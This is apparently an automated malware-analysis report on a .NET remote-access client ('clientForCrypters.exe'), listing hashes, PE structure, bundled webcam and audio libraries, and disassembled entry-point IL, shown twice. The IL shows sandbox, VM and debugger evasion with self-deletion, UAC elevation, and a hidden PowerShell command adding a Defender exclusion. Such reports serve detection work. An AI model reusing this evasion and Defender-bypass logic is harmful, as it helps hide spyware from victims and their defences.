Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Low

Hash
Hash Value
MD5
832f9bd4bd5b18e3764d9c6750504636
Sha1
ba14ba9f05dc608e77e62cd1aca15da0350c4d59
Sha256
21fb5e039247e3b506be23d5a6b370dd5ca6a84d7ce77fd09e97a3af770909b7
Sha384
3c6c9ec9f6669905fe1ee778e71c3052ae108750f4c3f928f9a6076d972f372d68bcbafea00be6d73bbbdd6ccacb0116
Sha512
2edba616bcdb341b5c4da38b2e0ef1b0eff6ed7cb326acaa85b8377499c12ad750191ce215956e78184a5a767db3efbbfc70e571b626d8a40f778da3ac392a4b
SSDeep
49152:/ugVUlsHjkmiGWU5FLGpMZ7iKPJ5W16sclR0BxMfzaRw4msF:/ugVUuHjkDGjzqpgmwQ13uRxfzew
TLSH
CAD5010C33FACA08F2BF4BF4A87585654771FE179C62D76C59A1799E14B2F08AA10723

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
Client.Properties.Resources.resources
MALG102_deluxe_billy_prop_closeup_jpg_removebg_preview
[NBF]root.Data
[NBF]root.Data-preview.png
UAC
[NBF]root.Data
[NBF]root.Data-preview.png
Z
[NBF]root.Data
[NBF]root.Data-preview.png
result
[NBF]root.Data
[NBF]root.Data-preview.png
screamer
[NBF]root.Data
[NBF]root.Data-preview.png
tumblr_136e6a239bac2739768f0067f7c3df4b_5344d85d_1280
[NBF]root.Data
[NBF]root.Data-preview.png
youtube_LOriFzhoUTA_628x480_h264
Client.Shit.Packaged.Forms.Chat.resources
$this.Icon
[NBF]root.IconData
imageList1.ImageStream
[NBF]root.Data
Client.Shit.Packaged.Forms.Games.MineSweeper.resources
Client.Shit.Packaged.Forms.InputBlock.resources
$this.Icon
[NBF]root.IconData
Client.Shit.Packaged.Forms.LockScreen.resources
$this.Icon
[NBF]root.IconData
costura.aforge.dll.compressed
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
costura.aforge.video.directshow.dll.compressed
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
.Net Resources
AForge.Video.DirectShow.Properties.Resources.resources
camera
[NBF]root.Data
[NBF]root.Data-preview.png
AForge.Video.DirectShow.VideoCaptureDeviceForm.resources
costura.aforge.video.dll.compressed
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
costura.costura.dll.compressed
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
costura.costura.pdb.compressed
costura.microsoft.win32.registry.dll.compressed
[Authenticode]_c8796d01.p7b
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
IBC
ID:0000
ID:0
RT_VERSION
ID:0001
ID:0
.Net Resources
FxResources.Microsoft.Win32.Registry.SR.resources
costura.naudio.asio.dll.compressed
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
costura.naudio.core.dll.compressed
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
costura.naudio.dll.compressed
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
costura.naudio.midi.dll.compressed
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
costura.naudio.wasapi.dll.compressed
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
costura.naudio.winforms.dll.compressed
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
.Net Resources
NAudio.WinForms.Gui.PanSlider.resources
$this.DefaultModifiers
$this.GridSize
$this.Language
NAudio.WinForms.Gui.VolumeSlider.resources
costura.naudio.winmm.dll.compressed
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
costura.newtonsoft.json.dll.compressed
[Authenticode]_a3656d89.p7b
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
costura.stuff.dll.compressed
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
costura.stuff.pdb.compressed
costura.system.buffers.dll.compressed
[Authenticode]_8c38879e.p7b
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
.Net Resources
FxResources.System.Buffers.SR.resources
costura.system.memory.dll.compressed
[Authenticode]_15ab3250.p7b
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
.Net Resources
FxResources.System.Memory.SR.resources
costura.system.numerics.vectors.dll.compressed
[Authenticode]_ae030d4d.p7b
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
.Net Resources
FxResources.System.Numerics.Vectors.SR.resources
costura.system.resources.extensions.dll.compressed
[Authenticode]_f4f062be.p7b
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
.Net Resources
FxResources.System.Resources.Extensions.SR.resources
ILLink.Substitutions.xml
costura.system.runtime.compilerservices.unsafe.dll.compressed
[Authenticode]_2ce621b7.p7b
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
costura.system.security.accesscontrol.dll.compressed
[Authenticode]_d262bb6d.p7b
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
.Net Resources
FxResources.System.Security.AccessControl.SR.resources
costura.system.security.principal.windows.dll.compressed
[Authenticode]_20569987.p7b
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
IBC
ID:0000
ID:0
RT_VERSION
ID:0001
ID:0
.Net Resources
System.Security.Principal.Windows.xml
costura.metadata
Informations
Name
Value
Info

PE Detect: PeReader OK (file layout)

Module Name

clientForCrypters.exe

Full Name

clientForCrypters.exe

EntryPoint

System.Void Program::Main(System.String[])

Scope Name

clientForCrypters.exe

Scope Type

ModuleDef

Kind

Windows

Runtime Version

v4.0.30319

Tables Header Version

512

WinMD Version

<null>

Assembly Name

clientForCrypters

Assembly Version

1.0.0.0

Assembly Culture

<null>

Has PublicKey

False

PublicKey Token

<null>

Target Framework

.NETFramework,Version=v4.7.2

Total Strings

3709

Main Method

System.Void Program::Main(System.String[])

Main IL Instruction Count

213

Main IL

newobj System.Void Program/<>c__DisplayClass1_0::.ctor() stloc.0 <null> ldloc.0 <null> ldarg.0 <null> stfld System.String[] Program/<>c__DisplayClass1_0::args ldloc.0 <null> ldfld System.String[] Program/<>c__DisplayClass1_0::args ldlen <null> conv.i4 <null> ldc.i4.2 <null> blt.s IL_0043: call System.Boolean MutexControl::CreateMutex() ldc.i4.s 30 call System.String Stuff.Helpers::Random(System.Int32) stsfld System.String Config::Mutex ldloc.0 <null> ldfld System.String[] Program/<>c__DisplayClass1_0::args ldc.i4.0 <null> ldelem.ref <null> stsfld System.String Config::ht ldloc.0 <null> ldfld System.String[] Program/<>c__DisplayClass1_0::args ldc.i4.1 <null> ldelem.ref <null> call System.Int32 System.Convert::ToInt32(System.String) stsfld System.Int32 Config::pt call System.Boolean MutexControl::CreateMutex() brtrue.s IL_0050: ldsfld System.Threading.ThreadExceptionEventHandler Program/<>c::<>9__1_0 ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) ldsfld System.Threading.ThreadExceptionEventHandler Program/<>c::<>9__1_0 dup <null> brtrue.s IL_006F: call System.Void System.Windows.Forms.Application::add_ThreadException(System.Threading.ThreadExceptionEventHandler) pop <null> ldsfld Program/<>c Program/<>c::<>9 ldftn System.Void Program/<>c::<Main>b__1_0(System.Object,System.Threading.ThreadExceptionEventArgs) newobj System.Void System.Threading.ThreadExceptionEventHandler::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Threading.ThreadExceptionEventHandler Program/<>c::<>9__1_0 call System.Void System.Windows.Forms.Application::add_ThreadException(System.Threading.ThreadExceptionEventHandler) call System.AppDomain System.AppDomain::get_CurrentDomain() ldsfld System.UnhandledExceptionEventHandler Program/<>c::<>9__1_1 dup <null> brtrue.s IL_0098: callvirt System.Void System.AppDomain::add_UnhandledException(System.UnhandledExceptionEventHandler) pop <null> ldsfld Program/<>c Program/<>c::<>9 ldftn System.Void Program/<>c::<Main>b__1_1(System.Object,System.UnhandledExceptionEventArgs) newobj System.Void System.UnhandledExceptionEventHandler::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.UnhandledExceptionEventHandler Program/<>c::<>9__1_1 callvirt System.Void System.AppDomain::add_UnhandledException(System.UnhandledExceptionEventHandler) ldsfld System.EventHandler`1<System.Threading.Tasks.UnobservedTaskExceptionEventArgs> Program/<>c::<>9__1_2 dup <null> brtrue.s IL_00BC: call System.Void System.Threading.Tasks.TaskScheduler::add_UnobservedTaskException(System.EventHandler`1<System.Threading.Tasks.UnobservedTaskExceptionEventArgs>) pop <null> ldsfld Program/<>c Program/<>c::<>9 ldftn System.Void Program/<>c::<Main>b__1_2(System.Object,System.Threading.Tasks.UnobservedTaskExceptionEventArgs) newobj System.Void System.EventHandler`1<System.Threading.Tasks.UnobservedTaskExceptionEventArgs>::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.EventHandler`1<System.Threading.Tasks.UnobservedTaskExceptionEventArgs> Program/<>c::<>9__1_2 call System.Void System.Threading.Tasks.TaskScheduler::add_UnobservedTaskException(System.EventHandler`1<System.Threading.Tasks.UnobservedTaskExceptionEventArgs>) call System.Void System.Windows.Forms.Application::EnableVisualStyles() ldc.i4.0 <null> call System.Void System.Windows.Forms.Application::SetCompatibleTextRenderingDefault(System.Boolean) ldsfld System.Int32 Config::Delay ldc.i4 1000 mul <null> call System.Void System.Threading.Thread::Sleep(System.Int32) ldsfld System.Boolean Config::HideFile brfalse.s IL_00F8: ldsfld System.Boolean Config::VM call System.Void HideClient::Execute() leave.s IL_00F8: ldsfld System.Boolean Config::VM stloc.1 <null> ldstr HideFile ldloc.1 <null> call System.Void Program::LogError(System.String,System.Exception) leave.s IL_00F8: ldsfld System.Boolean Config::VM ldsfld System.Boolean Config::VM brfalse.s IL_0132: ldsfld System.Boolean Config::HidProc call System.Boolean Shit.DebugProtector.MainModule::IsSandboxie() brtrue.s IL_0122: call System.Void Shit.DebugProtector.MainModule::SelfDelete() call System.Boolean Shit.DebugProtector.MainModule::IsVM() brtrue.s IL_0122: call System.Void Shit.DebugProtector.MainModule::SelfDelete() call System.Boolean Shit.DebugProtector.MainModule::IsDebugger() brtrue.s IL_0122: call System.Void Shit.DebugProtector.MainModule::SelfDelete() call System.Boolean Shit.DebugProtector.MainModule::IsdnSpyRun() brtrue.s IL_0122: call System.Void Shit.DebugProtector.MainModule::SelfDelete() call System.Boolean Shit.DebugProtector.MainModule::IsEmulation() brfalse.s IL_012D: call System.Void Shit.DebugProtector.VMCheck::Analyze() call System.Void Shit.DebugProtector.MainModule::SelfDelete() ldc.i4.m1 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Shit.DebugProtector.VMCheck::Analyze() ldsfld System.Boolean Config::HidProc brfalse.s IL_013F: ldsfld System.Boolean Config::UAC newobj System.Void ProcessKiller::.ctor() pop <null> ldsfld System.Boolean Config::UAC brfalse.s IL_0185: ldsfld System.Boolean Config::OpenWebsite call System.Boolean Check::Admin() brfalse.s IL_0185: ldsfld System.Boolean Config::OpenWebsite newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor() dup <null> call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() callvirt System.String System.Reflection.Assembly::get_Location() callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldstr runas callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Verb(System.String) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) pop <null> ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) leave.s IL_0185: ldsfld System.Boolean Config::OpenWebsite pop <null> leave.s IL_0185: ldsfld System.Boolean Config::OpenWebsite ldsfld System.Boolean Config::OpenWebsite brfalse.s IL_019C: ldsfld System.Boolean Config::Box ldsfld System.String Config::Website call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> leave.s IL_019C: ldsfld System.Boolean Config::Box pop <null> leave.s IL_019C: ldsfld System.Boolean Config::Box ldsfld System.Boolean Config::Box brfalse.s IL_01C8: ldsfld System.Boolean Config::ProcessCritical ldsfld System.Action Program/<>c::<>9__1_3 dup <null> brtrue.s IL_01C2: call System.Threading.Tasks.Task System.Threading.Tasks.Task::Run(System.Action) pop <null> ldsfld Program/<>c Program/<>c::<>9 ldftn System.Void Program/<>c::<Main>b__1_3() newobj System.Void System.Action::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Action Program/<>c::<>9__1_3 call System.Threading.Tasks.Task System.Threading.Tasks.Task::Run(System.Action) pop <null> ldsfld System.Boolean Config::ProcessCritical brfalse.s IL_01D4: ldsfld System.Boolean Config::Defender call System.Void processcritical::critical() ldsfld System.Boolean Config::Defender brfalse.s IL_024F: nop call System.Boolean Check::Admin() brfalse.s IL_024F: nop call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() callvirt System.Diagnostics.ProcessModule System.Diagnostics.Process::get_MainModule() dup <null> brtrue.s IL_01F3: call System.String System.Diagnostics.ProcessModule::get_FileName() pop <null> ldnull <null> br.s IL_01F8: stloc.2 call System.String System.Diagnostics.ProcessModule::get_FileName() stloc.2 <null> ldloc.2 <null> call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_024A: leave.s IL_024F newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor() dup <null> ldstr powershell.exe callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String) dup <null> ldstr -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass "Add-MpPreference -ExclusionProcess ' ldloc.2 <null> ldstr '" call System.String System.String::Concat(System.String,System.String,System.String) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.3 <null> ldloc.3 <null> brfalse.s IL_024A: leave.s IL_024F ldloc.3 <null> ldc.i4 5000 call System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> leave.s IL_024F: nop pop <null> leave.s IL_024F: nop nop <null> newobj System.Void Client.Raton.SillyClient::.ctor() stsfld Client.Raton.SillyClient Program::client leave.s IL_026C: ldsfld System.Action Program/<>c::<>9__1_4 stloc.s V_4 ldstr Client Init ldloc.s V_4 call System.Void Program::LogError(System.String,System.Exception) leave.s IL_02AD: ret ldsfld System.Action Program/<>c::<>9__1_4 dup <null> brtrue.s IL_028B: call System.Threading.Tasks.Task System.Threading.Tasks.Task::Run(System.Action) pop <null> ldsfld Program/<>c Program/<>c::<>9 ldftn System.Void Program/<>c::<Main>b__1_4() newobj System.Void System.Action::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Action Program/<>c::<>9__1_4 call System.Threading.Tasks.Task System.Threading.Tasks.Task::Run(System.Action) pop <null> ldloc.0 <null> ldftn System.Threading.Tasks.Task Program/<>c__DisplayClass1_0::<Main>b__5() newobj System.Void System.Func`1<System.Threading.Tasks.Task>::.ctor(System.Object,System.IntPtr) call System.Threading.Tasks.Task System.Threading.Tasks.Task::Run(System.Func`1<System.Threading.Tasks.Task>) pop <null> newobj System.Void System.Windows.Forms.ApplicationContext::.ctor() call System.Void System.Windows.Forms.Application::Run(System.Windows.Forms.ApplicationContext) ret <null>

Module Name

clientForCrypters.exe

Full Name

clientForCrypters.exe

EntryPoint

System.Void Program::Main(System.String[])

Scope Name

clientForCrypters.exe

Scope Type

ModuleDef

Kind

Windows

Runtime Version

v4.0.30319

Tables Header Version

512

WinMD Version

<null>

Assembly Name

clientForCrypters

Assembly Version

1.0.0.0

Assembly Culture

<null>

Has PublicKey

False

PublicKey Token

<null>

Target Framework

.NETFramework,Version=v4.7.2

Total Strings

3709

Main Method

System.Void Program::Main(System.String[])

Main IL Instruction Count

213

Main IL

newobj System.Void Program/<>c__DisplayClass1_0::.ctor() stloc.0 <null> ldloc.0 <null> ldarg.0 <null> stfld System.String[] Program/<>c__DisplayClass1_0::args ldloc.0 <null> ldfld System.String[] Program/<>c__DisplayClass1_0::args ldlen <null> conv.i4 <null> ldc.i4.2 <null> blt.s IL_0043: call System.Boolean MutexControl::CreateMutex() ldc.i4.s 30 call System.String Stuff.Helpers::Random(System.Int32) stsfld System.String Config::Mutex ldloc.0 <null> ldfld System.String[] Program/<>c__DisplayClass1_0::args ldc.i4.0 <null> ldelem.ref <null> stsfld System.String Config::ht ldloc.0 <null> ldfld System.String[] Program/<>c__DisplayClass1_0::args ldc.i4.1 <null> ldelem.ref <null> call System.Int32 System.Convert::ToInt32(System.String) stsfld System.Int32 Config::pt call System.Boolean MutexControl::CreateMutex() brtrue.s IL_0050: ldsfld System.Threading.ThreadExceptionEventHandler Program/<>c::<>9__1_0 ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) ldsfld System.Threading.ThreadExceptionEventHandler Program/<>c::<>9__1_0 dup <null> brtrue.s IL_006F: call System.Void System.Windows.Forms.Application::add_ThreadException(System.Threading.ThreadExceptionEventHandler) pop <null> ldsfld Program/<>c Program/<>c::<>9 ldftn System.Void Program/<>c::<Main>b__1_0(System.Object,System.Threading.ThreadExceptionEventArgs) newobj System.Void System.Threading.ThreadExceptionEventHandler::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Threading.ThreadExceptionEventHandler Program/<>c::<>9__1_0 call System.Void System.Windows.Forms.Application::add_ThreadException(System.Threading.ThreadExceptionEventHandler) call System.AppDomain System.AppDomain::get_CurrentDomain() ldsfld System.UnhandledExceptionEventHandler Program/<>c::<>9__1_1 dup <null> brtrue.s IL_0098: callvirt System.Void System.AppDomain::add_UnhandledException(System.UnhandledExceptionEventHandler) pop <null> ldsfld Program/<>c Program/<>c::<>9 ldftn System.Void Program/<>c::<Main>b__1_1(System.Object,System.UnhandledExceptionEventArgs) newobj System.Void System.UnhandledExceptionEventHandler::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.UnhandledExceptionEventHandler Program/<>c::<>9__1_1 callvirt System.Void System.AppDomain::add_UnhandledException(System.UnhandledExceptionEventHandler) ldsfld System.EventHandler`1<System.Threading.Tasks.UnobservedTaskExceptionEventArgs> Program/<>c::<>9__1_2 dup <null> brtrue.s IL_00BC: call System.Void System.Threading.Tasks.TaskScheduler::add_UnobservedTaskException(System.EventHandler`1<System.Threading.Tasks.UnobservedTaskExceptionEventArgs>) pop <null> ldsfld Program/<>c Program/<>c::<>9 ldftn System.Void Program/<>c::<Main>b__1_2(System.Object,System.Threading.Tasks.UnobservedTaskExceptionEventArgs) newobj System.Void System.EventHandler`1<System.Threading.Tasks.UnobservedTaskExceptionEventArgs>::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.EventHandler`1<System.Threading.Tasks.UnobservedTaskExceptionEventArgs> Program/<>c::<>9__1_2 call System.Void System.Threading.Tasks.TaskScheduler::add_UnobservedTaskException(System.EventHandler`1<System.Threading.Tasks.UnobservedTaskExceptionEventArgs>) call System.Void System.Windows.Forms.Application::EnableVisualStyles() ldc.i4.0 <null> call System.Void System.Windows.Forms.Application::SetCompatibleTextRenderingDefault(System.Boolean) ldsfld System.Int32 Config::Delay ldc.i4 1000 mul <null> call System.Void System.Threading.Thread::Sleep(System.Int32) ldsfld System.Boolean Config::HideFile brfalse.s IL_00F8: ldsfld System.Boolean Config::VM call System.Void HideClient::Execute() leave.s IL_00F8: ldsfld System.Boolean Config::VM stloc.1 <null> ldstr HideFile ldloc.1 <null> call System.Void Program::LogError(System.String,System.Exception) leave.s IL_00F8: ldsfld System.Boolean Config::VM ldsfld System.Boolean Config::VM brfalse.s IL_0132: ldsfld System.Boolean Config::HidProc call System.Boolean Shit.DebugProtector.MainModule::IsSandboxie() brtrue.s IL_0122: call System.Void Shit.DebugProtector.MainModule::SelfDelete() call System.Boolean Shit.DebugProtector.MainModule::IsVM() brtrue.s IL_0122: call System.Void Shit.DebugProtector.MainModule::SelfDelete() call System.Boolean Shit.DebugProtector.MainModule::IsDebugger() brtrue.s IL_0122: call System.Void Shit.DebugProtector.MainModule::SelfDelete() call System.Boolean Shit.DebugProtector.MainModule::IsdnSpyRun() brtrue.s IL_0122: call System.Void Shit.DebugProtector.MainModule::SelfDelete() call System.Boolean Shit.DebugProtector.MainModule::IsEmulation() brfalse.s IL_012D: call System.Void Shit.DebugProtector.VMCheck::Analyze() call System.Void Shit.DebugProtector.MainModule::SelfDelete() ldc.i4.m1 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Shit.DebugProtector.VMCheck::Analyze() ldsfld System.Boolean Config::HidProc brfalse.s IL_013F: ldsfld System.Boolean Config::UAC newobj System.Void ProcessKiller::.ctor() pop <null> ldsfld System.Boolean Config::UAC brfalse.s IL_0185: ldsfld System.Boolean Config::OpenWebsite call System.Boolean Check::Admin() brfalse.s IL_0185: ldsfld System.Boolean Config::OpenWebsite newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor() dup <null> call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() callvirt System.String System.Reflection.Assembly::get_Location() callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldstr runas callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Verb(System.String) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) pop <null> ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) leave.s IL_0185: ldsfld System.Boolean Config::OpenWebsite pop <null> leave.s IL_0185: ldsfld System.Boolean Config::OpenWebsite ldsfld System.Boolean Config::OpenWebsite brfalse.s IL_019C: ldsfld System.Boolean Config::Box ldsfld System.String Config::Website call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> leave.s IL_019C: ldsfld System.Boolean Config::Box pop <null> leave.s IL_019C: ldsfld System.Boolean Config::Box ldsfld System.Boolean Config::Box brfalse.s IL_01C8: ldsfld System.Boolean Config::ProcessCritical ldsfld System.Action Program/<>c::<>9__1_3 dup <null> brtrue.s IL_01C2: call System.Threading.Tasks.Task System.Threading.Tasks.Task::Run(System.Action) pop <null> ldsfld Program/<>c Program/<>c::<>9 ldftn System.Void Program/<>c::<Main>b__1_3() newobj System.Void System.Action::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Action Program/<>c::<>9__1_3 call System.Threading.Tasks.Task System.Threading.Tasks.Task::Run(System.Action) pop <null> ldsfld System.Boolean Config::ProcessCritical brfalse.s IL_01D4: ldsfld System.Boolean Config::Defender call System.Void processcritical::critical() ldsfld System.Boolean Config::Defender brfalse.s IL_024F: nop call System.Boolean Check::Admin() brfalse.s IL_024F: nop call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() callvirt System.Diagnostics.ProcessModule System.Diagnostics.Process::get_MainModule() dup <null> brtrue.s IL_01F3: call System.String System.Diagnostics.ProcessModule::get_FileName() pop <null> ldnull <null> br.s IL_01F8: stloc.2 call System.String System.Diagnostics.ProcessModule::get_FileName() stloc.2 <null> ldloc.2 <null> call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_024A: leave.s IL_024F newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor() dup <null> ldstr powershell.exe callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String) dup <null> ldstr -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass "Add-MpPreference -ExclusionProcess ' ldloc.2 <null> ldstr '" call System.String System.String::Concat(System.String,System.String,System.String) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.3 <null> ldloc.3 <null> brfalse.s IL_024A: leave.s IL_024F ldloc.3 <null> ldc.i4 5000 call System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> leave.s IL_024F: nop pop <null> leave.s IL_024F: nop nop <null> newobj System.Void Client.Raton.SillyClient::.ctor() stsfld Client.Raton.SillyClient Program::client leave.s IL_026C: ldsfld System.Action Program/<>c::<>9__1_4 stloc.s V_4 ldstr Client Init ldloc.s V_4 call System.Void Program::LogError(System.String,System.Exception) leave.s IL_02AD: ret ldsfld System.Action Program/<>c::<>9__1_4 dup <null> brtrue.s IL_028B: call System.Threading.Tasks.Task System.Threading.Tasks.Task::Run(System.Action) pop <null> ldsfld Program/<>c Program/<>c::<>9 ldftn System.Void Program/<>c::<Main>b__1_4() newobj System.Void System.Action::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Action Program/<>c::<>9__1_4 call System.Threading.Tasks.Task System.Threading.Tasks.Task::Run(System.Action) pop <null> ldloc.0 <null> ldftn System.Threading.Tasks.Task Program/<>c__DisplayClass1_0::<Main>b__5() newobj System.Void System.Func`1<System.Threading.Tasks.Task>::.ctor(System.Object,System.IntPtr) call System.Threading.Tasks.Task System.Threading.Tasks.Task::Run(System.Func`1<System.Threading.Tasks.Task>) pop <null> newobj System.Void System.Windows.Forms.ApplicationContext::.ctor() call System.Void System.Windows.Forms.Application::Run(System.Windows.Forms.ApplicationContext) ret <null>

832f9bd4bd5b18e3764d9c6750504636 (3 MB)
File Structure
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
Client.Properties.Resources.resources
MALG102_deluxe_billy_prop_closeup_jpg_removebg_preview
[NBF]root.Data
[NBF]root.Data-preview.png
UAC
[NBF]root.Data
[NBF]root.Data-preview.png
Z
[NBF]root.Data
[NBF]root.Data-preview.png
result
[NBF]root.Data
[NBF]root.Data-preview.png
screamer
[NBF]root.Data
[NBF]root.Data-preview.png
tumblr_136e6a239bac2739768f0067f7c3df4b_5344d85d_1280
[NBF]root.Data
[NBF]root.Data-preview.png
youtube_LOriFzhoUTA_628x480_h264
Client.Shit.Packaged.Forms.Chat.resources
$this.Icon
[NBF]root.IconData
imageList1.ImageStream
[NBF]root.Data
Client.Shit.Packaged.Forms.Games.MineSweeper.resources
Client.Shit.Packaged.Forms.InputBlock.resources
$this.Icon
[NBF]root.IconData
Client.Shit.Packaged.Forms.LockScreen.resources
$this.Icon
[NBF]root.IconData
costura.aforge.dll.compressed
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
costura.aforge.video.directshow.dll.compressed
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
.Net Resources
AForge.Video.DirectShow.Properties.Resources.resources
camera
[NBF]root.Data
[NBF]root.Data-preview.png
AForge.Video.DirectShow.VideoCaptureDeviceForm.resources
costura.aforge.video.dll.compressed
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
costura.costura.dll.compressed
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
costura.costura.pdb.compressed
costura.microsoft.win32.registry.dll.compressed
[Authenticode]_c8796d01.p7b
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
IBC
ID:0000
ID:0
RT_VERSION
ID:0001
ID:0
.Net Resources
FxResources.Microsoft.Win32.Registry.SR.resources
costura.naudio.asio.dll.compressed
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
